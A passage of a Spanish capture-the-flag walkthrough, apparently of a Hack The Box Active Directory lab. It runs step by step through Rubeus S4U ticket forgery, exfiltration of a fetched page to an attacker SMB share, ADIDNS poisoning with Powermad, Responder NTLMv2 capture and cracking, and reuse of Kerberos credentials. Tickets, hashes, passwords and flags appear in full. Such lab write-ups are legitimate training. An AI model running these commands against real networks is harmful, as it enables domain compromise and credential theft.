  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.3

[*] Action: Calculate Password Hash(es)

[*] Input password             : 123456
[*] Input username             : attackersystem$
[*] Input domain               : htb.local
[*] Salt                       : HTB.LOCALhostattacketsystem.htb.local
[*]       rc4_hmac             : 32ED87BDB5FDC5E9CBA88547376818D4
[*]       aes128_cts_hmac_sha1 : BB8C605808D76972251505B80FE6FDC2
[*]       aes256_cts_hmac_sha1 : 25AE34697F20A4A40AA2568B2E000B9FEAF46DE374C432D4A34D36F1EBC50392
[*]       des_cbc_md5          : 13E576A2D051854A

PS C:\Users\Administrator\Documents>

Usando ese hash para el equipo attackersystem$ en el dominio htb.local intentamos obtener un ticket suplantando a Administrator, sin embargo nos devuelve error

PS C:\Users\Administrator\Documents> .\Rubeus.exe s4u /user:attackersystem$ /rc4:32ED87BDB5FDC5E9CBA88547376818D4 /impersonateuser:Administrator /msdsspn:http/web.htb.local /domain:htb.local /ptt  

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.3

[*] Action: S4U

[*] Using rc4_hmac hash: 32ED87BDB5FDC5E9CBA88547376818D4
[*] Building AS-REQ (w/ preauth) for: 'htb.local\attackersystem$'
[*] Using domain controller: 192.168.3.203:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

      doIE/jCCBPqgAwIBBaEDAgEWooIEFTCCBBFhggQNMIIECaADAgEFoQsbCUhUQi5MT0NBTKIeMBygAwIB
      AqEVMBMbBmtyYnRndBsJaHRiLmxvY2Fso4ID0zCCA8+gAwIBEqEDAgECooIDwQSCA70ChJzxn2/YgfCI
      TjegtHjwUzzFILuP8PwqhwEwiTchLluMMnw4SbH5IwwQ0dmq81maSaxCRauA68z2x0nZqqjduK/sMdsE
      KR4r4xqbkYAtlRaeXgJGSt0Ilxznnb+40pfLB/bjLQmFGfn4A0S9KlIEbqP2b3Ep9Tlifxc75Xurjccu
      fx1v6GCtgcVfSPtZdB2TILpSG4rPx/wHtmJBE5LK6fpupsK+UL5hL0ASBnnoo+aUbT/xZlc3cP7XpovV
      ibaVNT7jGK04W6XQo9vpNiLOOQH1l93uF/CTbJ0PN6yOVd9jBNoZxcf8DupugBeqmExPlWpF6cii7Tjr
      1H3nnDBlDyRqxN4ChchGPAh9Zk0zHgPN5kbsrqYhsY/qWUroa5erDc5SVuIF6P1CqxouXCPescqH72IN
      ybe4ZBuvpv/xRZRiEySquoImsnEVpRpzu+bMYtHfOc66uKiz9N+teqx7vOD+nMXbk9qGD8jUIibTWdg8
      TAxnwnp47k8C+zKoLiwTjWUi+Pogkj8Uo7taWvmodxohTWE3cH9/RUeay+8YU+RvBBn+QCpxEe5QIpmf
      Gb1CDoZ7MNbc4HtS550wGxulw1f1If9eufmwL5z68dn7xXyy2hUQf4XDRqTdtABDBwh8shYBbG/lEbgZ
      4AIcG2pESETw2SXbwoQDFcD9e6FnrdneY8UZ+eUQDxoZI8ydem6piXXAbFMWQxM+21zJXp+hf2ifwT/S
      LQUTZdtxtOJdxbVwVW+3s9mKSEQpnN3+PuZIiH1tPkHb98cM/beG94YPb8d+xIIGjruoPUsa5/izQ9iY
      FZ11107P5e3QqoWWxyA7AMBXXv3N2pQTISAHQQ44NhkGicybSTXcOe5pZZV4dEpOhxSQfU4StCrIjHCp
      cvhs79c0uS2zTQ/WdEO99r9PoD2n/WEm5Rf+TOVewMFw0Ac5bNX/5e8LBOOm+hb/kTSpA7T2zzqR+qDq
      KBD53aQCjaSrapjQLhxmJTAoKtjHRpQXk1Lhx8+AGD6Jq/osZ0Dq3ROFtmJkFPURlBxR4BitDTIU718d
      hdpHrdGXWw6Cf8PX11ZcSCLEKX7HN6CeRJe+JTn8zs8eKJJKb5ryxU06hBXFY1r+Ts8subO9CkrPon8h
      f3P+AUF7r3z8fJq4qPYfX49fkVxHdPYfD9RdDluGn2Oa/r2PhhkGo1xeLF+Tfg87Tj4nJXlWBG3P6pdD
      i42dcuWPy9mYJrIZhEz659dIhIJ+hiaonvm+5+cA7bKVghk01agwdet0aPhd0W+jgdQwgdGgAwIBAKKB
      yQSBxn2BwzCBwKCBvTCBujCBt6AbMBmgAwIBF6ESBBCEC4iuHAxmnekBkwS3uuo6oQsbCUhUQi5MT0NB
      TKIcMBqgAwIBAaETMBEbD2F0dGFja2Vyc3lzdGVtJKMHAwUAQOEAAKURGA8yMDIzMDQyOTAzMTQxMlqm
      ERgPMjAyMzA0MjkxMzE0MTJapxEYDzIwMjMwNTA2MDMxNDEyWqgLGwlIVEIuTE9DQUypHjAcoAMCAQKh
      FTATGwZrcmJ0Z3QbCWh0Yi5sb2NhbA==


[*] Action: S4U

[*] Building S4U2self request for: 'attackersystem$@HTB.LOCAL'
[*] Using domain controller: dc1.htb.local (192.168.3.203)
[*] Sending S4U2self request to 192.168.3.203:88
[+] S4U2self success!
[*] Got a TGS for 'administrator' to 'attackersystem$@HTB.LOCAL'
[*] base64(ticket.kirbi):

      doIFQjCCBT6gAwIBBaEDAgEWooIEXTCCBFlhggRVMIIEUaADAgEFoQsbCUhUQi5MT0NBTKIcMBqgAwIB
      AaETMBEbD2F0dGFja2Vyc3lzdGVtJKOCBB0wggQZoAMCARehAwIBAaKCBAsEggQHxjCHrGk75BLfMhwB
      i2j8R0nBHGsVdhhdlOwmOzmHKOVgKzOZWV0i8XiwENqndAq1HXTlvYB9yMXVLHX05WOOC4AY43Hx9QrQ
      Nhjx71XX4aBoG0ZkkD92NpR0f8+LR0IzOCBKaT+wS6Ie3vXdQSJb/H6I1yTlftUFBIxWD39/nTlaW+sd
      IVSG0CEcyaS+kESRvfwUlAjGKAngpkm+yYchHK0GaZDqSlFouQ+VJHI7hyJNT5pxsR6F5bKDhwPyTnj3
      30ltI102p8k8eHjF9HMV1gH8M8SpetwCNQ5q4k/dY1ojB5o6u2lE2hu+Uv3g7mV9ZmUoI9PT7RQyg+TN
      ME0aiDMOwRb2ppSOJyQ5tGxVSIoJHEoAjt3YTu/VibZc5cLPFOG60jItHWL7AnP2YW6xWJXNxw3LqwDa
      NmZWiceQPykKMSJn2ynce7XotpuAIgfEYfOFVjQn0QGVs759W6klxLAVenfpxaTIvimuscJnap2XrH0N
      QAZ8attbil6941TuA5HG6LdHgnlIopP2MDfERRuz3LACETNHv3EHqvBelAa6YRTNjO0iPAndcLzoXrY0
      B4ax9VwKBIOxFhrbc8xT70GvDYd1zUhkyEexLJ7RN/Ly+33YxyzIxK5fupFiA6hvoVA4yyk7Qvg6vWkH
      ff+LETnQmU8yTRUOAET3Epgn0CEJpI+Dr76I9QQAE8qrEEOtyHMim2e8rfSdFEC7dXst6xjpefoz4viB
      Do/BH5FfiztCnhsWtXdy3yS/Rr2oHf5J0mq+gAkU/suy+w8tbLezApGRxhd4NpYF3gMFWmFcCmSQ4dcV
      fxKS79k4thVZJSK21DMxNWdfnKjElb29/kCBEZClCQ58mArqSxSyNeiejvwF6IjK9W2cfPriuP9iNd2e
      8o47m59oiB8G9gg2yv1vnrZIpzVsHO0Q4n1z5aN+RDpAPz4CSIGWZjC8lYAfkyN/XF+L1cvs2lp05zje
      EH4F7OmBMgD1cDAZ38P4Jzw7TxWMFQzi0qOYyvOTdO6q6H82J55VK4yF26DI72CeqTzr97zrwj63b5Km
      FiOQha5eEsGzSmJnevaHHdYbkU5uYFK7J+HVxyAvhNA6U8rIjX6oeX1WzCeC+bdFOK+Okx9OSWZfKuO6
      G24PFbRVbv99KkBnKoXsK5cas/Ct52gTgP6MznGDEqgyRvH3dJ7hJMyXNC9KF0rDN8wdSWYwC34yWpdE
      MaGFSmP6CUS4P++hCs06QHLUydAE+HjK64R9ZuZ1h1xW+7GylCvS78BHc9cxbcmPNtywjoAzlkSzl/pG
      VcpS4c60/ySGwfHLpAwgkpY26KR6FwrvHhdkHmO/JncoOoNHhOf+bu7JtKEJzzgmCcXOY9+BJKYJS4uj
      gdAwgc2gAwIBAKKBxQSBwn2BvzCBvKCBuTCBtjCBs6AbMBmgAwIBF6ESBBA1WBJo9P8YFQszZ3QSNxpM
      oQsbCUhUQi5MT0NBTKIaMBigAwIBCqERMA8bDWFkbWluaXN0cmF0b3KjBwMFAAChAAClERgPMjAyMzA0
      MjkwMzE0MTJaphEYDzIwMjMwNDI5MTMxNDEyWqcRGA8yMDIzMDUwNjAzMTQxMlqoCxsJSFRCLkxPQ0FM
      qRwwGqADAgEBoRMwERsPYXR0YWNrZXJzeXN0ZW0k

[*] Impersonating user 'administrator' to target SPN 'http/web.htb.local'
[*] Building S4U2proxy request for service: 'http/web.htb.local'
[*] Using domain controller: dc1.htb.local (192.168.3.203)
[*] Sending S4U2proxy request to domain controller 192.168.3.203:88

[X] KRB-ERROR (13) : KDC_ERR_BADOPTION

PS C:\Users\Administrator\Documents>

Enumerando en bloodhound nos encontramos con un grupo Operations al cual solo pertenece el usuario lee, en el tal vez que puede haber un privilegio especial

Al probar de nuevo crear el ticket pero esta vez suplantando al usuario lee nos logra generar un ticket e importarlo que nos servira para acceder a web.htb.local

PS C:\Users\Administrator\Documents> .\Rubeus.exe s4u /user:attackersystem$ /rc4:32ED87BDB5FDC5E9CBA88547376818D4 /impersonateuser:lee /msdsspn:http/web.htb.local /domain:htb.local /ptt  
   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.3

[*] Action: S4U

[*] Using rc4_hmac hash: 32ED87BDB5FDC5E9CBA88547376818D4
[*] Building AS-REQ (w/ preauth) for: 'htb.local\attackersystem$'
[*] Using domain controller: 192.168.3.203:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

      doIE/jCCBPqgAwIBBaEDAgEWooIEFTCCBBFhggQNMIIECaADAgEFoQsbCUhUQi5MT0NBTKIeMBygAwIB
      AqEVMBMbBmtyYnRndBsJaHRiLmxvY2Fso4ID0zCCA8+gAwIBEqEDAgECooIDwQSCA70Gl8JoNiYSvTeP
      t/cTn/Imt8EBaSKCAEbEYCIQz2SaVVD3a2ZRND1hsnX+j28TqBP/F9kcPaW5bW779Yp1HZ9pi3FeoPNw
      ZwgDk8rMpE8KnZe+/eIu7L1ZSKUwHoTThSGBiard3BxQMSw9Z/TOz7WNjXoj2Ew5nyUC7ePoRgq49wzn
      Sp8X1+Qjb/OBoY083fcvwQ5nCUsvsKcXlSZhkiMSu239yCvB/FluCDc9+4kgA6Ki3AbF+q6g38t5ZqnG
      fRzYmSjxx5+ThCx9QDlfS0WAzmQgbE/u3yr92GhXVSa52sB4Ak30U7ol0G3mnBTuV2vgk8kVbn1FNzvl
      yf44/wkYOgUgPLNpuxNBpOHT+uc0O82Hqh3QFM92n33tm1aelSX2YXmhwMI1CXCF6xHfaSpVuBIojT6r
      gaRCgJ0N215klYQI3PmLqtuTNt7NFmbzVfDTX/QoUcQqngHlSP1RA1LAoz20SGrCH+5FhLd2COGtle8/
      a0gMfBDLimBIbzRhe78zl9xxVMQwecstdZrlyGmGMbiCbTl4OF7KLQS/T0BS/XYi/drOa930ZW5fkLkf
      tNo5p2agqG0W+Tn347b02G3JM62J+vZR4n+lopzU4kPAcqBxyj8JzESv4WO1df0JLVCzZou2/nQjvSbb
      /RUy+HuXlhJR6HJAGWwpaPaK9NNlU5lT0edtEOCOzUcT5Gj3+jvS2xMsLbPOtR1lO+0uxDKFqneogA8P
      uGNBTwM/a1NUeHu3J4mltpVCECQshBby/q1quamv28yMsbOuHAPk+jOXvO8FkqjnxpKOXqihpcEqE3zs
      d1ByCN1sW3ea/9TUfwJFJJl7hA+nu1gDeSECSKxW3GEkuEufBIgEix/gyZ4ZtvP471saPqukHVXiCLht
      7Dfibr0PezscZRLynbBrpdRUGpkKP8N65Hs29US7u9kSZIN6KDgGhynlnn2mO2l96ZlctWrBNlezlHf4
      c4qUHEJDw1nAIc8Bw0dXk905TMwSrbtD0eIYqrt29DMoY02xa9WOpUX72d5E/pRSNsTMJKk621oEwjti
      x0f4UWE7l1P4+GY4SFbO3nV7BtqqUtRTZYza4Y/zN+XEmkE8UIjzrkpaFE01N7RHoqg+x5IFToZcoh1r
      fjx5cbP8cGAvT3oOCpg97CE4d4jtI5755BJIiokQBfw5/Hp5PxVorjKqKeIEtdaHiJUxPAgRfEIvoB/q
      UJFXVf80x+QboYtUSu6vSyr3ySQEt1ww4UWpLjHjTnStcVHb+0y7aaHxnys3viejgdQwgdGgAwIBAKKB
      yQSBxn2BwzCBwKCBvTCBujCBt6AbMBmgAwIBF6ESBBAQLlkk2vkz97fQC58UL3+MoQsbCUhUQi5MT0NB
      TKIcMBqgAwIBAaETMBEbD2F0dGFja2Vyc3lzdGVtJKMHAwUAQOEAAKURGA8yMDIzMDQyOTAyNDExMFqm
      ERgPMjAyMzA0MjkxMjQxMTBapxEYDzIwMjMwNTA2MDI0MTEwWqgLGwlIVEIuTE9DQUypHjAcoAMCAQKh
      FTATGwZrcmJ0Z3QbCWh0Yi5sb2NhbA==


[*] Action: S4U

[*] Building S4U2self request for: 'attackersystem$@HTB.LOCAL'
[*] Using domain controller: dc1.htb.local (192.168.3.203)
[*] Sending S4U2self request to 192.168.3.203:88
[+] S4U2self success!
[*] Got a TGS for 'lee' to 'attackersystem$@HTB.LOCAL'
[*] base64(ticket.kirbi):

      doIEpjCCBKKgAwIBBaEDAgEWooIDyzCCA8dhggPDMIIDv6ADAgEFoQsbCUhUQi5MT0NBTKIcMBqgAwIB
      AaETMBEbD2F0dGFja2Vyc3lzdGVtJKOCA4swggOHoAMCARehAwIBAaKCA3kEggN1KW70YRAVBOg2kIsE
      MD8n+CWeqpjfuqbYP2h1dm4dX53vGuXOlC+Q2aKR/UefKRIE3VSm916SJVK/4CYceatJVpbZKWGcB4Bm
      SJLFypDvm+lCTN16eRW/VEcdmRoHPive9jiU6q3eo6QNI/JiwGCxtGViMt/efW3ydD5DdYTa9xh5joKf
      2MOndmp73F5kq0xk47HmwfTmTg/mlLSBhG0/7d/QTefgd5jiRoepXpcdPEJ6HroHvgLugPIG7Q30TNm5
      /trhYkc+7hDccFBupyvAdehcE3JRTYDgbzO5GZUZqsmVtJQEcAQ+8CoYsOdAGUEt9zqQTDG2lKOa1TLk
      AkKwV7wBYbqYiUPop7/QmIkX5/OBKkAp2U6t2+2JH74xoK3WSQt2cvORrWGmljQVhPQ6MyLcMDMUgZ2/
      Bu1MV8Bpj0qEi+6fRc3Ny6y8D1WCngzGjIbBjkarnd8B0GeIVmDL1mq0Q5AULyid06MvosQb34FIUBYU
      o7McPp18zFkFolS/RQNw6XVhLbvHLLYrQCUA6z8TfUKOu3c4yA9ecK3Nqn+wFK1+l0LreliWsBf5FL/Y
      C7NaKWubtRDDyDVRIA7f2CSBLP79b4oWVPntAqpr9CVM4oe4bS+6b9jxwF1SGXUZE0Lqm9+KA08RiH3s
      tDG2WReuKR6n21a/0k10yDYDOf3nciv0M8MZd3GpKjpMByph7lp7VGayy+Fjne2oxHZuC5+uaBuJiQ+m
      Y2mB6ccW0irHoGwoEO3ovub4LlL90R0641aCtWJ3qNZSjBmCjbhiMCdKzo9oYcAdTA++B7jLOIpJySJk
      3B8iLSXfH8o1LmE1cyCZI50fAyChYVvAQ9JaNAjG7r9AIdUaPbSCjshwc2nwKyCJMBGREyCMwJz6qUJx
      X/dLLvRgs3MQG8aRSde/gHeuGapk2Ag44KhbkLnJ5cMt8aae3NFsdvNiyCB0GaoUucXof0QoKIBS8XP2
      xPHqe9uuxD9TeX037Vgz9Fs0Y7L+Uqm64vUsk9f+2kgl2yN31dRlgHADCuKQ85X70XE/8YZvu/zTrorF
      xQYZUQA5sl2PyxDor6Mhx/Otv2tUVPR7HHk5/ZwBy9cXvPG4mhY6pI4ALlIaPKnLSp5cCKCEZq5RY/V/
      35O9t3g6n0IQRUsTACk6TuWiR6A9DaQspqFESe35jVnno4HGMIHDoAMCAQCigbsEgbh9gbUwgbKgga8w
      gawwgamgGzAZoAMCARehEgQQYDTbN6b1VNBxmveWBs3KAaELGwlIVEIuTE9DQUyiEDAOoAMCAQqhBzAF
      GwNsZWWjBwMFAAChAAClERgPMjAyMzA0MjkwMjQxMTBaphEYDzIwMjMwNDI5MTI0MTEwWqcRGA8yMDIz
      MDUwNjAyNDExMFqoCxsJSFRCLkxPQ0FMqRwwGqADAgEBoRMwERsPYXR0YWNrZXJzeXN0ZW0k

[*] Impersonating user 'lee' to target SPN 'http/web.htb.local'
[*] Building S4U2proxy request for service: 'http/web.htb.local'
[*] Using domain controller: dc1.htb.local (192.168.3.203)
[*] Sending S4U2proxy request to domain controller 192.168.3.203:88
[+] S4U2proxy success!
[*] base64(ticket.kirbi) for SPN 'http/web.htb.local':

      doIFWjCCBVagAwIBBaEDAgEWooIEezCCBHdhggRzMIIEb6ADAgEFoQsbCUhUQi5MT0NBTKIgMB6gAwIB
      AqEXMBUbBGh0dHAbDXdlYi5odGIubG9jYWyjggQ3MIIEM6ADAgESoQMCAQmiggQlBIIEIX1Q3yZ6k49P
      Tkk0jwxgepK5+bay2wgBWgBzTEtqVvgRqYmPnundz4SyT2EGGwb/O/eLXulnazIFUvhSgMWNakHnW2FM
      RJB/zAcdI24hYf0pA6p4dbzECn0hZbyd0JWfLwZwUjaR4a9lpWlLCwF+OEmm/vGEXzk9p/MtgB9U+jr0
      vPjyS8CoHNe9jzI0ZXb3xm0OngEzwm2WI+LnkbMEtSoWT1M0oG19MDPXcvMpR+k2wDiMSh/JoNC4Bh58
      1zZ1QlrmZwYp1ncsDUjjwdrZB/fNrSJTvXSdUe4TqvwFTN1ycmrnQo+GfaR2PCCCxo6G+QnNNc2lz6e6
      v/Xy0PbQeDfQMPPzASxUUhSDG5J6nhj5Z9BWdG0HFRxy7w9UT/ZupxhNkl3RmZPScRiiGkkYRal6t5Bm
      6oB0rLYcV81CYP/QHFMXE1kiksHEAYcXBQ2bmVY6wnqlMxU06lCMslh4yCY3G0vLdMZ5ZuUGT6Zdinq7
      dGnzBobG4VtXVvEE4AikgwzrL1RjcPxbUKYnhZlu7QXpPZty178kprN8UL+J9pXnH2QTLYwEB6Qiofsk
      V24h+gEFtYMyEVCgbTrkJfV5Y52m+2g8Es4m8vqXjJPbspNrmpzzNnVVDGrc0/I8BG1pH1cUeBLs7ToL
      Upfrrf3Q/NRyIl2inlVbdJa67noQcvv+lUZKEyoVsV+T0TmOX+UV5OPX9ujy0+sjAjVJI4mttrHse2Xe
      BHKwKNv4Sa5EBzZyK3L+t474SdA3bSOvcRvxCmtsLPlTH0xOGnsZtpNCvZrtVGxF/uKrdf8xFF1NxjZA
      RHWIiq/olNv6i6flfddlZd6ZJaIZEnvTmJCy84eGWfdrGaI3Ls0L/wxeZBoe+VccxsGesaqMgg+hUyoQ
      u/7W8z5OnnkGsfrDJKWtuOFUBbvyGcail08Ior4m1tjaijJtDrJssZGBBFPpNcrwCzx4WShBiN55q8m6
      FytVUewGCZ8UH40dP7SXglYVvTjn+8ms3YmAhC1fDOdvaLLQNbQRetjM7zqy7s+5dHI/VSsr/X7qhZ+y
      qNki5iBXq7x213m/fUygpGr5ZYP8DDun9g2mjvTVEfZFCDMpoTMZa7yHey0VVQ2ZqVfo/HZ3n8zKscEh
      2bZyuelLhzaNKuOZSQ3vYSvRUdxpW9ktcJNYRLsHsuviy39QJZe2sUg7PeI/1i7+wGp11KgbATJGP+zI
      WpoCYfaM753nY6AqT9fHb/zeULpz1QYCaqH95KwuaFbg+iyP+DyW5HonK1V5n/PTsr8YVSE+2le2Suo6
      vADTfU9MdOfy3jsA/lBaTsanI4PH/aLjpUg6rjj9vpyx09wzoE+BCyMmGUPHi9rbgj2pMtLfW2t+7/9r
      sn6XUfPMJePjcwPtdnFUZxOYR2TjphcBsPXOx+WjgcowgcegAwIBAKKBvwSBvH2BuTCBtqCBszCBsDCB
      raAbMBmgAwIBEaESBBBmVAONy74l2UlQd+yjzrU1oQsbCUhUQi5MT0NBTKIQMA6gAwIBCqEHMAUbA2xl
      ZaMHAwUAQKEAAKURGA8yMDIzMDQyOTAyNDExMFqmERgPMjAyMzA0MjkxMjQxMTBapxEYDzIwMjMwNTA2
      MDI0MTEwWqgLGwlIVEIuTE9DQUypIDAeoAMCAQKhFzAVGwRodHRwGw13ZWIuaHRiLmxvY2Fs

[+] Ticket successfully imported!

PS C:\Users\Administrator\Documents> klist

Current LogonId is 0:0x3e7

Cached Tickets: (1)

#0>	Client: lee @ HTB.LOCAL
	Server: http/web.htb.local @ HTB.LOCAL
	KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
	Ticket Flags 0x40a10000 -> forwardable renewable pre_authent name_canonicalize  
	Start Time: 4/28/2023 19:56:12 (local)
	End Time:   4/29/2023 5:56:11 (local)
	Renew Time: 5/5/2023 19:56:11 (local)
	Session Key Type: AES-128-CTS-HMAC-SHA1-96
	Cache Flags: 0 
	Kdc Called: 

PS C:\Users\Administrator\Documents>

Si de primeras en el navegador intentamos acceder con la ip a la página del equipo WEB de este equipo nos devolvera un error 401.2 ya que no estamos autorizados

Sin embargo al hacerlo desde la powershell donde esta importado nuestro ticket, este se autenticara a la web con el y ahora nos devuelve un codigo de estado 200

PS C:\Users\Administrator\Documents> Invoke-WebRequest -UseBasicParsing -UseDefaultCredentials http://web.htb.local | Select StatusCode  

StatusCode
----------
       200

PS C:\Users\Administrator\Documents>

Podemos hacer una petición a el y guardar el contenido en un archivo output.html

PS C:\Users\Administrator\Documents> Invoke-WebRequest -UseBasicParsing -UseDefaultCredentials -Uri http://web.htb.local -OutFile output.html  
PS C:\Users\Administrator\Documents>

Finalmente como antes montamos un servidor smb donde vamos a copiar el archivo

❯ impacket-smbserver kali . -smb2support
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0  
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

PS C:\Users\Administrator\Documents> cp output.html \\10.10.14.10\kali\output.html  
PS C:\Users\Administrator\Documents>

Abrimos el output.html en el navegador y nos encontramos con un KeeWeb el cual contiene bajo el dominio web.htb.local el usuario remote_user y su contraseña

Ya que el usuario se llama remote_user probamos si las credenciales son validas mediante una autenticacion con winrm hacia web.htb.local, devuelve Pwn3d!

❯ crackmapexec winrm web.htb.local -u remote_user -p 'FZg28$dJe*Hx7c'
SMB         web.htb.local   5985   WEB              [*] Windows 6.3 Build 9600 (name:WEB) (domain:htb.local)  
HTTP        web.htb.local   5985   WEB              [*] http://web.htb.local:5985/wsman
WINRM       web.htb.local   5985   WEB              [+] htb.local\remote_user:FZg28$dJe*Hx7c (Pwn3d!)

Podemos simplemente conectarnos con evil-winrm y leer la flag en el escritorio

❯ evil-winrm -i web.htb.local -u remote_user -p 'FZg28$dJe*Hx7c'  
PS C:\Users\remote_user.HTB\Documents> whoami
htb\remote_user
PS C:\Users\remote_user.HTB\Documents> type ..\Desktop\flag.txt
HADES{From_RBCD_To_p4s5word_v@Ult}
PS C:\Users\remote_user.HTB\Documents>

Celestial

HADES{Why_llmnr_wh3n_y0u_got_adidns}

En el directorio Program Files podemos encontrar que esta instalado Wireshark

PS C:\Program Files> dir

    Directory: C:\Program Files

Mode                LastWriteTime     Length Name
----                -------------     ------ ----
d----         8/19/2019   9:20 PM            Common Files
d----          9/3/2019   9:10 PM            Docker Toolbox
d----          9/3/2019   9:11 PM            Git
d----         3/21/2014  11:09 AM            Internet Explorer
d----         8/25/2019  12:37 PM            Npcap
d----          9/3/2019   9:12 PM            Oracle
d----         10/2/2019   4:30 PM            Update Services
d----         8/19/2019   9:22 PM            VMware
d----         10/3/2019   2:21 AM            WindowsPowerShell  
d----         8/25/2019  12:38 PM            Wireshark

PS C:\Program Files>

Entramos en el directorio y con tshark nos ponemos en escucha de cualquier trafico desde la interfaz Ethernet0, el output lo guardamos como capture.pcap

PS C:\Program Files\Wireshark> .\tshark.exe -i Ethernet0 -w C:\ProgramData\capture.pcap  
Capturing on 'Ethernet0'
^C
PS C:\Program Files\Wireshark>

Abrimos la captura de trafico con wireshark y podemos ver que se han realizado algunas peticiones DNS hacia los subdominios db1, db2 y db3 de htb.local

Esperando poder capturar algun trafico con algun tipo de autenticacion iniciaremos subiendo nuevamente el modulo de Powermad.ps1 e importandolo

PS C:\Users\remote_user.HTB\Documents> upload Powermad.ps1

Info: Uploading Powermad.ps1 to C:\Users\remote_user.HTB\Documents\Powermad.ps1  

Data: 180768 bytes of 180768 bytes copied

Info: Upload successful!

PS C:\Users\remote_user.HTB\Documents> Import-Module .\Powermad.ps1
PS C:\Users\remote_user.HTB\Documents>

Los usuarios autenticados pueden modificar el dns, definimos las credenciales de remote_user y hacemos que al apuntar a db1 apunte a nuestra ip de la vpn

PS C:\Users\remote_user.HTB\Documents> $SecPassword = ConvertTo-SecureString 'FZg28$dJe*Hx7c' -AsPlainText -Force
PS C:\Users\remote_user.HTB\Documents> $Cred = New-Object System.Management.Automation.PSCredential('htb.local\remote_user', $SecPassword)
PS C:\Users\remote_user.HTB\Documents> New-ADIDNSNode -Node db1 -Data 10.10.14.10 -DomainController dc1.htb.local -Domain htb.local -Zone htb.local -Credential $Cred -Forest htb.local  
PS C:\Users\remote_user.HTB\Documents>

Ahora podemos comprobar que db1.htb.local apunta a nuestra direccion ip

PS C:\Users\remote_user.HTB\Documents> nslookup db1 192.168.3.203  

DNS request timed out.
    timeout was 2 seconds.
Server:  UnKnown
Address:  192.168.3.203

Name:    db1.htb.local
Address:  10.10.14.10

PS C:\Users\remote_user.HTB\Documents>

Despues de unos minutos de estar en escucha con responder, recibimos una petición con autenticación por parte de Administrator y su hash NTLMv2

❯ sudo responder -I tun0
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.1.3.0

[+] Listening for events...

[SMB] NTLMv2-SSP Client   : 10.13.38.16
[SMB] NTLMv2-SSP Username : \administrator
[SMB] NTLMv2-SSP Hash     : administrator:::1122334455667788:9F531BAB908E89540CBF2CEBD6019340:0101000000000000802CD0056F79D9014A57C603B004B95000000000020008004C004E003800350001001E00570049004E002D0044004200360055004A004D005300550057005700420004003400570049004E002D0044004200360055004A004D00530055005700570042002E004C004E00380035002E004C004F00430041004C00030014004C004E00380035002E004C004F00430041004C00050014004C004E00380035002E004C004F00430041004C0007000800802CD0056F79D901060004000200000008003000300000000000000000000000003000005C512391B0E2AEA8D470AC66A19C4505C2B4BEB2102AC8B3847E4282E4C57F040A001000000000000000000000000000000000000900240063006900660073002F006400620031002E006800740062002E006C006F00630061006C00000000000000000000000000  

De primeras john no logra romper el hash con el rockyou.txt sin embargo al aplicar algunas reglas obtenemos la contraseña Myp@ssw0rd para Administrator

❯ john -w:/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt hash --rules:d3ad0ne
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Press 'q' or Ctrl-C to abort, almost any other key for status
Myp@ssw0rd       (ADMINISTRATOR)
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably  
Session completed.

Con crackmapexec comprobamos la contraseña de Administrator de manera local hacia el equipo WEB, estas son válidas tantpo para smb como para winrm

❯ crackmapexec winrm web.htb.local -u Administrator -p Myp@ssw0rd --local-auth
SMB         web.htb.local   5985   WEB              [*] Windows 6.3 Build 9600 (name:WEB) (domain:WEB)  
HTTP        web.htb.local   5985   WEB              [*] http://web.htb.local:5985/wsman
WINRM       web.htb.local   5985   WEB              [+] WEB\Administrator:Myp@ssw0rd (Pwn3d!)

Nos conectamos como Administrator hacia WEB donde podemos leer la flag

❯ evil-winrm -i web.htb.local -u Administrator -p Myp@ssw0rd  
PS C:\Users\Administrator\Documents> whoami
web\administrator
PS C:\Users\Administrator\Documents> type ..\Desktop\flag.txt
HADES{Why_llmnr_wh3n_y0u_got_adidns}
PS C:\Users\Administrator\Documents>

Dominion

HADES{Tam1ng_Kerber0s_Wi1l_gRant_4cCess_t0_H4des}

Al intentar reutilizar la contraseña para Administrator pero esta vez hacia el DC1 a nivel de dominio, nos devuelve un error de que la cuenta esta restringida

❯ crackmapexec smb dc1.htb.local -u Administrator -p Myp@ssw0rd
SMB         dc1.htb.local   445    DC1              [*] Windows 10.0 Build 17763 x64 (name:DC1) (domain:htb.local) (signing:True) (SMBv1:False)  
SMB         dc1.htb.local   445    DC1              [-] htb.local\Administrator:Myp@ssw0rd STATUS_ACCOUNT_RESTRICTION

Esto es porque el usuario Administrator como podemos ver en bloodhound pertenece al gropo Protected Users y no se puede autenticar a nivel de smb

La solucion es muy sencilla ya que la restriccion solo aplica para smb, al agregar el parametro -k para autenticarnos por kerberos, devuelve un Pwn3d!, es valida

❯ crackmapexec smb dc1.htb.local -u Administrator -p Myp@ssw0rd -k
SMB         dc1.htb.local   445    DC1              [*] Windows 10.0 Build 17763 x64 (name:DC1) (domain:htb.local) (signing:True) (SMBv1:False)  
SMB         dc1.htb.local   445    DC1              [+] htb.local\Administrator:Myp@ssw0rd (Pwn3d!)

Hay varias formas de ejecutar comandos en el DC, una de ellas es simplemente definiendo las credenciales y ejecutar comandos con Invoke-Command hacia DC1

